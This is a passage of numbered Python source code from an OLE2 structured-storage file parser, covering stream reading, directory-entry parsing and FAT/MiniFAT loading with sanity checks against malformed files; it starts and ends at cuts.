488 | ## f.write(tmp_data) 489 | ## f.close() 490 | ## debug('data read so far: %d bytes' % len(tmp_data)) 491 | raise IOError('incorrect OLE FAT, sector index out of range') 492 | #TODO: merge this code with OleFileIO.getsect() ? 493 | #TODO: check if this works with 4K sectors: 494 | try: 495 | fp.seek(offset + sectorsize * sect) 496 | except: 497 | debug('sect=%d, seek=%d, filesize=%d' % 498 | (sect, offset+sectorsize*sect, filesize)) 499 | raise IOError('OLE sector index out of range') 500 | sector_data = fp.read(sectorsize) 501 | # [PL] check if there was enough data: 502 | # Note: if sector is the last of the file, sometimes it is not a 503 | # complete sector (of 512 or 4K), so we may read less than 504 | # sectorsize. 505 | if len(sector_data)!=sectorsize and sect!=(len(fat)-1): 506 | debug('sect=%d / len(fat)=%d, seek=%d / filesize=%d, len read=%d' % 507 | (sect, len(fat), offset+sectorsize*sect, filesize, len(sector_data))) 508 | debug('seek+len(read)=%d' % (offset+sectorsize*sect+len(sector_data))) 509 | raise IOError('incomplete OLE sector') 510 | data.append(sector_data) 511 | # jump to next sector in the FAT: 512 | try: 513 | sect = fat[sect] 514 | except IndexError: 515 | # [PL] if pointer is out of the FAT an exception is raised 516 | raise IOError('incorrect OLE FAT, sector index out of range') 517 | #[PL] Last sector should be a "end of chain" marker: 518 | if sect != ENDOFCHAIN: 519 | raise IOError('incorrect last sector index in OLE stream') 520 | data = b"".join(data) 521 | # data = string.join(data, "") 522 | # Data is truncated to the actual stream size: 523 | if len(data) >= size: 524 | data = data[:size] 525 | # actual stream size is stored for future use: 526 | self.size = size 527 | elif unknown_size: 528 | # actual stream size was not known, now we know the size of read 529 | # data: 530 | self.size = len(data) 531 | else: 532 | # read data is less than expected: 533 | debug('len(data)=%d, size=%d' % (len(data), size)) 534 | raise IOError('OLE stream size is less than declared') 535 | # when all data is read in memory, StringIO constructor is called 536 | StringIO.__init__(self, data) 537 | # Then the _OleStream object can be used as a read-only file object. 538 | 539 | 540 | #--- _OleDirectoryEntry ------------------------------------------------------- 541 | 542 | class _OleDirectoryEntry: 543 | 544 | """ 545 | OLE2 Directory Entry 546 | """ 547 | #[PL] parsing code moved from OleFileIO.loaddirectory 548 | 549 | # struct to parse directory entries: 550 | # <: little-endian byte order 551 | # 64s: string containing entry name in unicode (max 31 chars) + null char 552 | # H: uint16, number of bytes used in name buffer, including null = (len+1)*2 553 | # B: uint8, dir entry type (between 0 and 5) 554 | # B: uint8, color: 0=black, 1=red 555 | # I: uint32, index of left child node in the red-black tree, NOSTREAM if none 556 | # I: uint32, index of right child node in the red-black tree, NOSTREAM if none 557 | # I: uint32, index of child root node if it is a storage, else NOSTREAM 558 | # 16s: CLSID, unique identifier (only used if it is a storage) 559 | # I: uint32, user flags 560 | # 8s: uint64, creation timestamp or zero 561 | # 8s: uint64, modification timestamp or zero 562 | # I: uint32, SID of first sector if stream or ministream, SID of 1st sector 563 | # of stream containing ministreams if root entry, 0 otherwise 564 | # I: uint32, total stream size in bytes if stream (low 32 bits), 0 otherwise 565 | # I: uint32, total stream size in bytes if stream (high 32 bits), 0 otherwise 566 | STRUCT_DIRENTRY = '<64sHBBIII16sI8s8sIII' 567 | # size of a directory entry: 128 bytes 568 | DIRENTRY_SIZE = 128 569 | assert struct.calcsize(STRUCT_DIRENTRY) == DIRENTRY_SIZE 570 | 571 | 572 | def __init__(self, entry, sid, olefile): 573 | """ 574 | Constructor for an _OleDirectoryEntry object. 575 | Parses a 128-bytes entry from the OLE Directory stream. 576 | 577 | entry : string (must be 128 bytes long) 578 | sid : index of this directory entry in the OLE file directory 579 | olefile: OleFileIO containing this directory entry 580 | """ 581 | self.sid = sid 582 | # ref to olefile is stored for future use 583 | self.olefile = olefile 584 | # kids is a list of children entries, if this entry is a storage: 585 | # (list of _OleDirectoryEntry objects) 586 | self.kids = [] 587 | # kids_dict is a dictionary of children entries, indexed by their 588 | # name in lowercase: used to quickly find an entry, and to detect 589 | # duplicates 590 | self.kids_dict = {} 591 | # flag used to detect if the entry is referenced more than once in 592 | # directory: 593 | self.used = False 594 | # decode DirEntry 595 | ( 596 | name, 597 | namelength, 598 | self.entry_type, 599 | self.color, 600 | self.sid_left, 601 | self.sid_right, 602 | self.sid_child, 603 | clsid, 604 | self.dwUserFlags, 605 | self.createTime, 606 | self.modifyTime, 607 | self.isectStart, 608 | sizeLow, 609 | sizeHigh 610 | ) = struct.unpack(_OleDirectoryEntry.STRUCT_DIRENTRY, entry) 611 | if self.entry_type not in [STGTY_ROOT, STGTY_STORAGE, STGTY_STREAM, STGTY_EMPTY]: 612 | olefile._raise_defect(DEFECT_INCORRECT, 'unhandled OLE storage type') 613 | # only first directory entry can (and should) be root: 614 | if self.entry_type == STGTY_ROOT and sid != 0: 615 | olefile._raise_defect(DEFECT_INCORRECT, 'duplicate OLE root entry') 616 | if sid == 0 and self.entry_type != STGTY_ROOT: 617 | olefile._raise_defect(DEFECT_INCORRECT, 'incorrect OLE root entry') 618 | #debug (struct.unpack(fmt_entry, entry[:len_entry])) 619 | # name should be at most 31 unicode characters + null character, 620 | # so 64 bytes in total (31*2 + 2): 621 | if namelength>64: 622 | olefile._raise_defect(DEFECT_INCORRECT, 'incorrect DirEntry name length') 623 | # if exception not raised, namelength is set to the maximum value: 624 | namelength = 64 625 | # only characters without ending null char are kept: 626 | name = name[:(namelength-2)] 627 | # name is converted from unicode to Latin-1: 628 | self.name = _unicode(name) 629 | 630 | debug('DirEntry SID=%d: %s' % (self.sid, repr(self.name))) 631 | debug(' - type: %d' % self.entry_type) 632 | debug(' - sect: %d' % self.isectStart) 633 | debug(' - SID left: %d, right: %d, child: %d' % (self.sid_left, 634 | self.sid_right, self.sid_child)) 635 | 636 | # sizeHigh is only used for 4K sectors, it should be zero for 512 bytes 637 | # sectors, BUT apparently some implementations set it as 0xFFFFFFFFL, 1 638 | # or some other value so it cannot be raised as a defect in general: 639 | if olefile.sectorsize == 512: 640 | if sizeHigh != 0 and sizeHigh != 0xFFFFFFFF: 641 | debug('sectorsize=%d, sizeLow=%d, sizeHigh=%d (%X)' % 642 | (olefile.sectorsize, sizeLow, sizeHigh, sizeHigh)) 643 | olefile._raise_defect(DEFECT_UNSURE, 'incorrect OLE stream size') 644 | self.size = sizeLow 645 | else: 646 | self.size = sizeLow + (long(sizeHigh)<<32) 647 | debug(' - size: %d (sizeLow=%d, sizeHigh=%d)' % (self.size, sizeLow, sizeHigh)) 648 | 649 | # self.clsid = _clsid(clsid) 650 | # a storage should have a null size, BUT some implementations such as 651 | # Word 8 for Mac seem to allow non-null values => Potential defect: 652 | if self.entry_type == STGTY_STORAGE and self.size != 0: 653 | olefile._raise_defect(DEFECT_POTENTIAL, 'OLE storage with size>0') 654 | # check if stream is not already referenced elsewhere: 655 | if self.entry_type in (STGTY_ROOT, STGTY_STREAM) and self.size>0: 656 | if self.size < olefile.minisectorcutoff \ 657 | and self.entry_type==STGTY_STREAM: # only streams can be in MiniFAT 658 | # ministream object 659 | minifat = True 660 | else: 661 | minifat = False 662 | olefile._check_duplicate_stream(self.isectStart, minifat) 663 | 664 | 665 | 666 | def build_storage_tree(self): 667 | """ 668 | Read and build the red-black tree attached to this _OleDirectoryEntry 669 | object, if it is a storage. 670 | Note that this method builds a tree of all subentries, so it should 671 | only be called for the root object once. 672 | """ 673 | debug('build_storage_tree: SID=%d - %s - sid_child=%d' 674 | % (self.sid, repr(self.name), self.sid_child)) 675 | if self.sid_child != NOSTREAM: 676 | # if child SID is not NOSTREAM, then this entry is a storage. 677 | # Let's walk through the tree of children to fill the kids list: 678 | self.append_kids(self.sid_child) 679 | 680 | # Note from OpenOffice documentation: the safest way is to 681 | # recreate the tree because some implementations may store broken 682 | # red-black trees... 683 | 684 | # in the OLE file, entries are sorted on (length, name). 685 | # for convenience, we sort them on name instead: 686 | # (see __cmp__ method in this class) 687 | # self.kids.sort() 688 | 689 | 690 | def append_kids(self, child_sid): 691 | """ 692 | Walk through red-black tree of children of this directory entry to add 693 | all of them to the kids list. (recursive method) 694 | 695 | child_sid : index of child directory entry to use, or None when called 696 | first time for the root. (only used during recursion) 697 | """ 698 | #[PL] this method was added to use simple recursion instead of a complex 699 | # algorithm. 700 | # if this is not a storage or a leaf of the tree, nothing to do: 701 | if child_sid == NOSTREAM: 702 | return 703 | # check if child SID is in the proper range: 704 | if child_sid<0 or child_sid>=len(self.olefile.direntries): 705 | self.olefile._raise_defect(DEFECT_FATAL, 'OLE DirEntry index out of range') 706 | # get child direntry: 707 | child = self.olefile._load_direntry(child_sid) #direntries[child_sid] 708 | debug('append_kids: child_sid=%d - %s - sid_left=%d, sid_right=%d, sid_child=%d' 709 | % (child.sid, repr(child.name), child.sid_left, child.sid_right, child.sid_child)) 710 | # the directory entries are organized as a red-black tree. 711 | # (cf. Wikipedia for details) 712 | # First walk through left side of the tree: 713 | self.append_kids(child.sid_left) 714 | # Check if its name is not already used (case-insensitive): 715 | # name_lower = child.name 716 | child.name = child.name.decode() 717 | name_lower = child.name.lower() 718 | if self.kids_dict.get(name_lower, None): 719 | self.olefile._raise_defect(DEFECT_INCORRECT, 720 | "Duplicate filename in OLE storage") 721 | # Then the child_sid _OleDirectoryEntry object is appended to the 722 | # kids list and dictionary: 723 | self.kids.append(child) 724 | self.kids_dict[name_lower] = child 725 | # Check if kid was not already referenced in a storage: 726 | if child.used: 727 | self.olefile._raise_defect(DEFECT_INCORRECT, 728 | 'OLE Entry referenced more than once') 729 | child.used = True 730 | # Finally walk through right side of the tree: 731 | self.append_kids(child.sid_right) 732 | # Afterwards build kid's own tree if it's also a storage: 733 | child.build_storage_tree() 734 | 735 | 736 | def __cmp__(self, other): 737 | "Compare entries by name" 738 | return cmp(self.name, other.name) 739 | #TODO: replace by the same function as MS implementation ? 740 | # (order by name length first, then case-insensitive order) 741 | 742 | 743 | 744 | #--- OleFileIO ---------------------------------------------------------------- 745 | 746 | class OleFileIO: 747 | """ 748 | OLE container object 749 | 750 | This class encapsulates the interface to an OLE 2 structured 751 | storage file. Use the {@link listdir} and {@link openstream} methods to 752 | access the contents of this file. 753 | 754 | Object names are given as a list of strings, one for each subentry 755 | level. The root entry should be omitted. For example, the following 756 | code extracts all image streams from a Microsoft Image Composer file: 757 | 758 | ole = OleFileIO("fan.mic") 759 | 760 | for entry in ole.listdir(): 761 | if entry[1:2] == "Image": 762 | fin = ole.openstream(entry) 763 | fout = open(entry[0:1], "wb") 764 | while 1: 765 | s = fin.read(8192) 766 | if not s: 767 | break 768 | fout.write(s) 769 | 770 | You can use the viewer application provided with the Python Imaging 771 | Library to view the resulting files (which happens to be standard 772 | TIFF files). 773 | """ 774 | 775 | def __init__(self, filename = None, raise_defects=DEFECT_FATAL): 776 | """ 777 | Constructor for OleFileIO class. 778 | 779 | filename: file to open. 780 | raise_defects: minimal level for defects to be raised as exceptions. 781 | (use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a 782 | security-oriented application, see source code for details) 783 | """ 784 | self._raise_defects_level = raise_defects 785 | if filename: 786 | self.open(filename) 787 | 788 | 789 | def _raise_defect(self, defect_level, message): 790 | """ 791 | This method should be called for any defect found during file parsing. 792 | It may raise an IOError exception according to the minimal level chosen 793 | for the OleFileIO object. 794 | 795 | defect_level: defect level, possible values are: 796 | DEFECT_UNSURE : a case which looks weird, but not sure it's a defect 797 | DEFECT_POTENTIAL : a potential defect 798 | DEFECT_INCORRECT : an error according to specifications, but parsing can go on 799 | DEFECT_FATAL : an error which cannot be ignored, parsing is impossible 800 | message: string describing the defect, used with raised exception. 801 | """ 802 | # added by [PL] 803 | if defect_level >= self._raise_defects_level: 804 | raise IOError(message) 805 | 806 | 807 | def open(self, filename): 808 | """ 809 | Open an OLE2 file. 810 | Reads the header, FAT and directory. 811 | 812 | filename: string-like or file-like object 813 | """ 814 | #[PL] check if filename is a string-like or file-like object: 815 | # (it is better to check for a read() method) 816 | if hasattr(filename, 'read'): 817 | # file-like object 818 | self.fp = filename 819 | else: 820 | # string-like object: filename of file on disk 821 | #TODO: if larger than 1024 bytes, this could be the actual data => StringIO 822 | self.fp = open(filename, "rb") 823 | # old code fails if filename is not a plain string: 824 | #if type(filename) == type(""): 825 | # self.fp = open(filename, "rb") 826 | #else: 827 | # self.fp = filename 828 | # obtain the filesize by using seek and tell, which should work on most 829 | # file-like objects: 830 | #TODO: do it above, using getsize with filename when possible? 831 | #TODO: fix code to fail with clear exception when filesize cannot be obtained 832 | self.fp.seek(0, os.SEEK_END) 833 | try: 834 | filesize = self.fp.tell() 835 | finally: 836 | self.fp.seek(0) 837 | self._filesize = filesize 838 | 839 | # lists of streams in FAT and MiniFAT, to detect duplicate references 840 | # (list of indexes of first sectors of each stream) 841 | self._used_streams_fat = [] 842 | self._used_streams_minifat = [] 843 | 844 | header = self.fp.read(512) 845 | 846 | if len(header) != 512 or header[:8] != MAGIC: 847 | self._raise_defect(DEFECT_FATAL, "not an OLE2 structured storage file") 848 | 849 | # [PL] header structure according to AAF specifications: 850 | ##Header 851 | ##struct StructuredStorageHeader { // [offset from start (bytes), length (bytes)] 852 | ##BYTE _abSig[8]; // [00H,08] {0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 853 | ## // 0x1a, 0xe1} for current version 854 | ##CLSID _clsid; // [08H,16] reserved must be zero (WriteClassStg/ 855 | ## // GetClassFile uses root directory class id) 856 | ##USHORT _uMinorVersion; // [18H,02] minor version of the format: 33 is 857 | ## // written by reference implementation 858 | ##USHORT _uDllVersion; // [1AH,02] major version of the dll/format: 3 for 859 | ## // 512-byte sectors, 4 for 4 KB sectors 860 | ##USHORT _uByteOrder; // [1CH,02] 0xFFFE: indicates Intel byte-ordering 861 | ##USHORT _uSectorShift; // [1EH,02] size of sectors in power-of-two; 862 | ## // typically 9 indicating 512-byte sectors 863 | ##USHORT _uMiniSectorShift; // [20H,02] size of mini-sectors in power-of-two; 864 | ## // typically 6 indicating 64-byte mini-sectors 865 | ##USHORT _usReserved; // [22H,02] reserved, must be zero 866 | ##ULONG _ulReserved1; // [24H,04] reserved, must be zero 867 | ##FSINDEX _csectDir; // [28H,04] must be zero for 512-byte sectors, 868 | ## // number of SECTs in directory chain for 4 KB 869 | ## // sectors 870 | ##FSINDEX _csectFat; // [2CH,04] number of SECTs in the FAT chain 871 | ##SECT _sectDirStart; // [30H,04] first SECT in the directory chain 872 | ##DFSIGNATURE _signature; // [34H,04] signature used for transactions; must 873 | ## // be zero. The reference implementation 874 | ## // does not support transactions 875 | ##ULONG _ulMiniSectorCutoff; // [38H,04] maximum size for a mini stream; 876 | ## // typically 4096 bytes 877 | ##SECT _sectMiniFatStart; // [3CH,04] first SECT in the MiniFAT chain 878 | ##FSINDEX _csectMiniFat; // [40H,04] number of SECTs in the MiniFAT chain 879 | ##SECT _sectDifStart; // [44H,04] first SECT in the DIFAT chain 880 | ##FSINDEX _csectDif; // [48H,04] number of SECTs in the DIFAT chain 881 | ##SECT _sectFat[109]; // [4CH,436] the SECTs of first 109 FAT sectors 882 | ##}; 883 | 884 | # [PL] header decoding: 885 | # '<' indicates little-endian byte ordering for Intel (cf. struct module help) 886 | fmt_header = '<8s16sHHHHHHLLLLLLLLLL' 887 | header_size = struct.calcsize(fmt_header) 888 | debug( "fmt_header size = %d, +FAT = %d" % (header_size, header_size + 109*4) ) 889 | header1 = header[:header_size] 890 | ( 891 | self.Sig, 892 | self.clsid, 893 | self.MinorVersion, 894 | self.DllVersion, 895 | self.ByteOrder, 896 | self.SectorShift, 897 | self.MiniSectorShift, 898 | self.Reserved, self.Reserved1, 899 | self.csectDir, 900 | self.csectFat, 901 | self.sectDirStart, 902 | self.signature, 903 | self.MiniSectorCutoff, 904 | self.MiniFatStart, 905 | self.csectMiniFat, 906 | self.sectDifStart, 907 | self.csectDif 908 | ) = struct.unpack(fmt_header, header1) 909 | debug( struct.unpack(fmt_header, header1)) 910 | 911 | if self.Sig != b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1': 912 | # OLE signature should always be present 913 | self._raise_defect(DEFECT_FATAL, "incorrect OLE signature") 914 | if self.clsid != b'\x00'*16: 915 | # according to AAF specs, CLSID should always be zero 916 | self._raise_defect(DEFECT_INCORRECT, "incorrect CLSID in OLE header") 917 | debug( "MinorVersion = %d" % self.MinorVersion ) 918 | debug( "DllVersion = %d" % self.DllVersion ) 919 | if self.DllVersion not in [3, 4]: 920 | # version 3: usual format, 512 bytes per sector 921 | # version 4: large format, 4K per sector 922 | self._raise_defect(DEFECT_INCORRECT, "incorrect DllVersion in OLE header") 923 | debug( "ByteOrder = %X" % self.ByteOrder ) 924 | if self.ByteOrder != 0xFFFE: 925 | # For now only common little-endian documents are handled correctly 926 | self._raise_defect(DEFECT_FATAL, "incorrect ByteOrder in OLE header") 927 | # TODO: add big-endian support for documents created on Mac ? 928 | self.SectorSize = 2**self.SectorShift 929 | debug( "SectorSize = %d" % self.SectorSize ) 930 | if self.SectorSize not in [512, 4096]: 931 | self._raise_defect(DEFECT_INCORRECT, "incorrect SectorSize in OLE header") 932 | if (self.DllVersion==3 and self.SectorSize!=512) \ 933 | or (self.DllVersion==4 and self.SectorSize!=4096): 934 | self._raise_defect(DEFECT_INCORRECT, "SectorSize does not match DllVersion in OLE header") 935 | self.MiniSectorSize = 2**self.MiniSectorShift 936 | debug( "MiniSectorSize = %d" % self.MiniSectorSize ) 937 | if self.MiniSectorSize not in [64]: 938 | self._raise_defect(DEFECT_INCORRECT, "incorrect MiniSectorSize in OLE header") 939 | if self.Reserved != 0 or self.Reserved1 != 0: 940 | self._raise_defect(DEFECT_INCORRECT, "incorrect OLE header (non-null reserved bytes)") 941 | debug( "csectDir = %d" % self.csectDir ) 942 | if self.SectorSize==512 and self.csectDir!=0: 943 | self._raise_defect(DEFECT_INCORRECT, "incorrect csectDir in OLE header") 944 | debug( "csectFat = %d" % self.csectFat ) 945 | debug( "sectDirStart = %X" % self.sectDirStart ) 946 | debug( "signature = %d" % self.signature ) 947 | # Signature should be zero, BUT some implementations do not follow this 948 | # rule => only a potential defect: 949 | if self.signature != 0: 950 | self._raise_defect(DEFECT_POTENTIAL, "incorrect OLE header (signature>0)") 951 | debug( "MiniSectorCutoff = %d" % self.MiniSectorCutoff ) 952 | debug( "MiniFatStart = %X" % self.MiniFatStart ) 953 | debug( "csectMiniFat = %d" % self.csectMiniFat ) 954 | debug( "sectDifStart = %X" % self.sectDifStart ) 955 | debug( "csectDif = %d" % self.csectDif ) 956 | 957 | # calculate the number of sectors in the file 958 | # (-1 because header doesn't count) 959 | self.nb_sect = ( (filesize + self.SectorSize-1) / self.SectorSize) - 1 960 | debug( "Number of sectors in the file: %d" % self.nb_sect ) 961 | 962 | # file clsid (probably never used, so we don't store it) 963 | # clsid = _clsid(header[8:24]) 964 | self.sectorsize = self.SectorSize #1 << i16(header, 30) 965 | self.minisectorsize = self.MiniSectorSize #1 << i16(header, 32) 966 | self.minisectorcutoff = self.MiniSectorCutoff # i32(header, 56) 967 | 968 | # check known streams for duplicate references (these are always in FAT, 969 | # never in MiniFAT): 970 | self._check_duplicate_stream(self.sectDirStart) 971 | # check MiniFAT only if it is not empty: 972 | if self.csectMiniFat: 973 | self._check_duplicate_stream(self.MiniFatStart) 974 | # check DIFAT only if it is not empty: 975 | if self.csectDif: 976 | self._check_duplicate_stream(self.sectDifStart) 977 | 978 | # Load file allocation tables 979 | self.loadfat(header) 980 | # Load direcory. This sets both the direntries list (ordered by sid) 981 | # and the root (ordered by hierarchy) members. 982 | self.loaddirectory(self.sectDirStart)#i32(header, 48)) 983 | self.ministream = None 984 | self.minifatsect = self.MiniFatStart #i32(header, 60) 985 | 986 | 987 | def close(self): 988 | """ 989 | close the OLE file, to release the file object 990 | """ 991 | self.fp.close() 992 | 993 | 994 | def _check_duplicate_stream(self, first_sect, minifat=False): 995 | """ 996 | Checks if a stream has not been already referenced elsewhere. 997 | This method should only be called once for each known stream, and only 998 | if stream size is not null. 999 | first_sect: index of first sector of the stream in FAT 1000 | minifat: if True, stream is located in the MiniFAT, else in the FAT 1001 | """ 1002 | if minifat: 1003 | debug('_check_duplicate_stream: sect=%d in MiniFAT' % first_sect) 1004 | used_streams = self._used_streams_minifat 1005 | else: 1006 | debug('_check_duplicate_stream: sect=%d in FAT' % first_sect) 1007 | # some values can be safely ignored (not a real stream): 1008 | if first_sect in (DIFSECT,FATSECT,ENDOFCHAIN,FREESECT): 1009 | return 1010 | used_streams = self._used_streams_fat 1011 | #TODO: would it be more efficient using a dict or hash values, instead 1012 | # of a list of long ? 1013 | if first_sect in used_streams: 1014 | self._raise_defect(DEFECT_INCORRECT, 'Stream referenced twice') 1015 | else: 1016 | used_streams.append(first_sect) 1017 | 1018 | 1019 | def sect2array(self, sect): 1020 | """ 1021 | convert a sector to an array of 32 bits unsigned integers, 1022 | swapping bytes on big endian CPUs such as PowerPC (old Macs) 1023 | """ 1024 | a = array.array(UINT32, sect) 1025 | # if CPU is big endian, swap bytes: 1026 | if sys.byteorder == 'big': 1027 | a.byteswap() 1028 | return a 1029 | 1030 | 1031 | def loadfat_sect(self, sect): 1032 | """ 1033 | Adds the indexes of the given sector to the FAT 1034 | sect: string containing the first FAT sector, or array of long integers 1035 | return: index of last FAT sector. 1036 | """ 1037 | # a FAT sector is an array of ulong integers. 1038 | if isinstance(sect, array.array): 1039 | # if sect is already an array it is directly used 1040 | fat1 = sect 1041 | else: 1042 | # if it's a raw sector, it is parsed in an array 1043 | fat1 = self.sect2array(sect) 1044 | # self.dumpsect(sect) 1045 | # The FAT is a sector chain starting at the first index of itself. 1046 | for isect in fat1: 1047 | #print "isect = %X" % isect 1048 | if isect == ENDOFCHAIN or isect == FREESECT: 1049 | # the end of the sector chain has been reached 1050 | break 1051 | # read the FAT sector 1052 | s = self.getsect(isect) 1053 | # parse it as an array of 32 bits integers, and add it to the 1054 | # global FAT array 1055 | nextfat = self.sect2array(s) 1056 | self.fat = self.fat + nextfat 1057 | return isect 1058 | 1059 | 1060 | def loadfat(self, header): 1061 | """ 1062 | Load the FAT table. 1063 | """ 1064 | # The header contains a sector numbers 1065 | # for the first 109 FAT sectors. Additional sectors are 1066 | # described by DIF blocks 1067 | 1068 | sect = header[76:512] 1069 | debug( "len(sect)=%d, so %d integers" % (len(sect), len(sect)/4) ) 1070 | #fat = [] 1071 | # [PL] FAT is an array of 32 bits unsigned ints, it's more effective 1072 | # to use an array than a list in Python. 1073 | # It's initialized as empty first: 1074 | self.fat = array.array(UINT32) 1075 | self.loadfat_sect(sect) 1076 | #self.dumpfat(self.fat) 1077 | ## for i in range(0, len(sect), 4): 1078 | ## ix = i32(sect, i) 1079 | ## #[PL] if ix == -2 or ix == -1: # ix == 0xFFFFFFFEL or ix == 0xFFFFFFFFL: 1080 | ## if ix == 0xFFFFFFFEL or ix == 0xFFFFFFFFL: 1081 | ## break 1082 | ## s = self.getsect(ix) 1083 | ## #fat = fat + map(lambda i, s=s: i32(s, i), range(0, len(s), 4)) 1084 | ## fat = fat + array.array(UINT32, s) 1085 | if self.csectDif != 0: 1086 | # [PL] There's a DIFAT because file is larger than 6.8MB 1087 | # some checks just in case: 1088 | if self.csectFat <= 109: 1089 | # there must be at least 109 blocks in header and the rest in 1090 | # DIFAT, so number of sectors must be >109. 1091 | self._raise_defect(DEFECT_INCORRECT, 'incorrect DIFAT, not enough sectors') 1092 | if self.sectDifStart >= self.nb_sect: 1093 | # initial DIFAT block index must be valid 1094 | self._raise_defect(DEFECT_FATAL, 'incorrect DIFAT, first index out of range') 1095 | debug( "DIFAT analysis..." ) 1096 | # We compute the necessary number of DIFAT sectors : 1097 | # (each DIFAT sector = 127 pointers + 1 towards next DIFAT sector) 1098 | nb_difat = (self.csectFat-109 + 126)/127 1099 | debug( "nb_difat = %d" % nb_difat ) 1100 | if self.csectDif != nb_difat: 1101 | raise IOError('incorrect DIFAT') 1102 | isect_difat = self.sectDifStart 1103 | for i in xrange(nb_difat): 1104 | debug( "DIFAT block %d, sector %X" % (i, isect_difat) ) 1105 | #TODO: check if corresponding FAT SID = DIFSECT 1106 | sector_difat = self.getsect(isect_difat) 1107 | difat = self.sect2array(sector_difat) 1108 | self.dumpsect(sector_difat) 1109 | self.loadfat_sect(difat[:127]) 1110 | # last DIFAT pointer is next DIFAT sector: 1111 | isect_difat = difat[127] 1112 | debug( "next DIFAT sector: %X" % isect_difat ) 1113 | # checks: 1114 | if isect_difat not in [ENDOFCHAIN, FREESECT]: 1115 | # last DIFAT pointer value must be ENDOFCHAIN or FREESECT 1116 | raise IOError('incorrect end of DIFAT') 1117 | ## if len(self.fat) != self.csectFat: 1118 | ## # FAT should contain csectFat blocks 1119 | ## print "FAT length: %d instead of %d" % (len(self.fat), self.csectFat) 1120 | ## raise IOError, 'incorrect DIFAT' 1121 | # since FAT is read from fixed-size sectors, it may contain more values 1122 | # than the actual number of sectors in the file. 1123 | # Keep only the relevant sector indexes: 1124 | if len(self.fat) > self.nb_sect: 1125 | debug('len(fat)=%d, shrunk to nb_sect=%d' % (len(self.fat), self.nb_sect)) 1126 | self.fat = self.fat[:int(self.nb_sect)] 1127 | debug('\nFAT:') 1128 | #self.dumpfat(self.fat) 1129 | 1130 | 1131 | def loadminifat(self): 1132 | """ 1133 | Load the MiniFAT table. 1134 | """ 1135 | # MiniFAT is stored in a standard sub-stream, pointed to by a header 1136 | # field. 1137 | # NOTE: there are two sizes to take into account for this stream: 1138 | # 1) Stream size is calculated according to the number of sectors 1139 | # declared in the OLE header. This allocated stream may be more than 1140 | # needed to store the actual sector indexes. 1141 | # (self.csectMiniFat is the number of sectors of size self.SectorSize) 1142 | stream_size = self.csectMiniFat * self.SectorSize 1143 | # 2) Actually used size is calculated by dividing the MiniStream size 1144 | # (given by root entry size) by the size of mini sectors, *4 for 1145 | # 32 bits indexes: 1146 | nb_minisectors = (self.root.size + self.MiniSectorSize-1) / self.MiniSectorSize 1147 | used_size = nb_minisectors * 4 1148 | debug('loadminifat(): minifatsect=%d, nb FAT sectors=%d, used_size=%d, stream_size=%d, nb MiniSectors=%d' % 1149 | (self.minifatsect, self.csectMiniFat, used_size, stream_size, nb_minisectors)) 1150 | if used_size > stream_size: 1151 | # This is not really a problem, but may indicate a wrong implementation: 1152 | self._raise_defect(DEFECT_INCORRECT, 'OLE MiniStream is larger than MiniFAT') 1153 | # In any case, first read stream_size: 1154 | s = self._open(self.minifatsect, stream_size, force_FAT=True).read() 1155 | #[PL] Old code replaced by an array: 1156 | #self.minifat = map(lambda i, s=s: i32(s, i), range(0, len(s), 4)) 1157 | self.minifat = self.sect2array(s) 1158 | # Then shrink the array to used size, to avoid indexes out of MiniStream: 1159 | debug('MiniFAT shrunk from %d to %d sectors' % (len(self.minifat), nb_minisectors)) 1160 | self.minifat = self.minifat[:int(nb_minisectors)] 1161 | debug('loadminifat(): len=%d' % len(self.minifat)) 1162 | debug('\nMiniFAT:') 1163 | # self.dumpfat(self.minifat) 1164 | 1165 | def getsect(self, sect): 1166 | """ 1167 | Read given sector from file on disk. 1168 | sect: sector index 1169 | returns a string containing the sector data. 1170 | """ 1171 | # [PL] this original code was wrong when sectors are 4KB instead of 1172 | # 512 bytes: 1173 | #self.fp.seek(512 + self.sectorsize * sect) 1174 | #[PL]: added safety checks: 1175 | #print "getsect(%X)" % sect 1176 | try: 1177 | self.fp.seek(self.sectorsize * (sect+1)) 1178 | except: 1179 | debug('getsect(): sect=%X, seek=%d, filesize=%d' % 1180 | (sect, self.sectorsize*(sect+1), self._filesize)) 1181 | self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range') 1182 | sector = self.fp.read(self.sectorsize) 1183 | if len(sector) != self.sectorsize: 1184 | debug('getsect(): sect=%X, read=%d, sectorsize=%d' % 1185 | (sect, len(sector), self.sectorsize)) 1186 | self._raise_defect(DEFECT_FATAL, 'incomplete OLE sector') 1187 | return sector 1188 | 1189 | 1190 | def loaddirectory(self, sect): 1191 | """ 1192 | Load the directory. 1193 | sect: sector index of directory stream. 1194 | """ 1195 | # The directory is stored in a standard 1196 | # substream, independent of its size. 1197 | 1198 | # open directory stream as a read-only file: 1199 | # (stream size is not known in advance) 1200 | self.directory_fp = self._open(sect) 1201 | 1202 | #[PL] to detect malformed documents and avoid DoS attacks, the maximum 1203 | # number of directory entries can be calculated: 1204 | max_entries = self.directory_fp.size / 128 1205 | debug('loaddirectory: size=%d, max_entries=%d' % 1206 | (self.directory_fp.size, max_entries)) 1207 | 1208 | # Create list of directory entries 1209 | #self.direntries = [] 1210 | # We start with a list of "None" object 1211 | self.direntries = [None] * int(max_entries) 1212 | ## for sid in xrange(max_entries): 1213 | ## entry = fp.read(128) 1214 | ## if not entry: 1215 | ## break 1216 | ## self.direntries.append(_OleDirectoryEntry(entry, sid, self)) 1217 | # load root entry: 1218 | root_entry = self._load_direntry(0) 1219 | # Root entry is the first entry: 1220 | self.root = self.direntries[0] 1221 | # read and build all storage trees, starting from the root: 1222 | self.root.build_storage_tree() 1223 | 1224 | 1225 | def _load_direntry (self, sid): 1226 | """ 1227 | Load a directory entry from the directory. 1228 | This method should only be called once for each storage/stream when 1229 | loading the directory. 1230 | sid: index of storage/stream in the directory. 1231 | return: a _OleDirectoryEntry object 1232 | raise: IOError if the entry has always been referenced. 1233 | """ 1234 | # check if SID is OK: 1235 | if sid<0 or sid>=len(self.direntries): 1236 | self._raise_defect(DEFECT_FATAL, "OLE directory index out of range") 1237 | # check if entry was already referenced: 1238 | if self.direntries[sid] is not None: 1239 | self._raise_defect(DEFECT_INCORRECT, 1240 | "double reference for OLE stream/storage") 1241 | # if exception not raised, return the object 1242 | return self.direntries[sid] 1243 | self.directory_fp.seek(sid * 128) 1244 | entry = self.directory_fp.read(128) 1245 | self.direntries[sid] = 